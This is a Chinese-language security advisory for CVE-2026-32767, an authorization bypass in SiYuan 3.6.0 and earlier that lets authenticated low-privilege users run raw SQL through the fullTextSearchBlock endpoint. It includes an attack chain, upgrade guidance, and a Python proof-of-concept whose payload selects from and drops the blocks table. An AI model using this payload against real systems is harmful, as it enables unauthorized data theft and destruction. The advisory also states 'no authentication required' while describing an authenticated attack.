IPBUF安全漏洞报告
English
CVE-2026-32767 CVSS 9.8 严重

CVE-2026-32767 SiYuan授权绕过致SQL注入漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-32767
漏洞类型
SQL注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
SiYuan

相关标签

SQL注入授权绕过SiYuanCVE-2026-32767严重漏洞

漏洞概述

SiYuan个人知识管理系统3.6.0及以下版本存在授权绕过漏洞。攻击者可在/api/search/fullTextSearchBlock接口通过设置method参数为2,将恶意输入作为原始SQL语句执行。该漏洞允许低权限用户绕过安全检查,执行任意SQL命令,导致数据库信息泄露或被破坏。

技术细节

该漏洞源于SiYuan在处理全文搜索请求时的逻辑缺陷与权限校验缺失。尽管官方的/api/query/sql接口正确实施了CheckAdminRole和CheckReadonly中间件以防止非授权访问,但/api/search/fullTextSearchBlock接口在method参数被设置为2时,未进行任何权限校验,直接将用户输入的内容传递给底层SQLite数据库执行。这使得任何经过身份验证的用户(包括仅拥有Reader角色的低权限用户),均可构造恶意Payload注入SQL语句。攻击者利用此漏洞可以执行SELECT、DELETE、UPDATE、DROP TABLE等任意高危操作,完全绕过应用预设的安全模型,对数据库造成毁灭性影响。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标正在运行SiYuan知识管理系统,且版本在3.6.0或以下。
STEP 2
2. 获取低权限账户
攻击者注册或获取一个普通用户账户,甚至只需Guest或Reader角色权限。
STEP 3
3. 构造恶意请求
攻击者向/api/search/fullTextSearchBlock端点发送POST请求,设置method=2,并在输入字段中注入恶意SQL语句。
STEP 4
4. 执行SQL注入
由于后端未进行权限校验直接执行SQL,攻击者成功读取敏感数据、删除表或获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target URL (Default SiYuan port is 6806) target_url = "http://localhost:6806/api/search/fullTextSearchBlock" # Valid authentication cookie/token is required as the user must be authenticated headers = { "Content-Type": "application/json", "Authorization": "Bearer YOUR_VALID_SESSION_TOKEN_HERE" } # Exploit payload # Setting method to 2 triggers the raw SQL execution path # The 'query' parameter accepts the raw SQL statement payload = { "method": 2, "query": "SELECT * FROM blocks; DROP TABLE blocks; --" } try: response = requests.post(target_url, headers=headers, json=payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! SQL executed.") print("[+] Response:", response.text) else: print("[-] Exploit failed or server returned error.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

SiYuan <= 3.6.0

防御指南

临时缓解措施
建议立即将SiYuan升级至3.6.1或更高版本以修复此漏洞。若暂时无法升级,应实施严格的网络访问控制列表(ACL),限制对/api/search/fullTextSearchBlock接口的访问,并加强对数据库异常操作的监控与审计。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表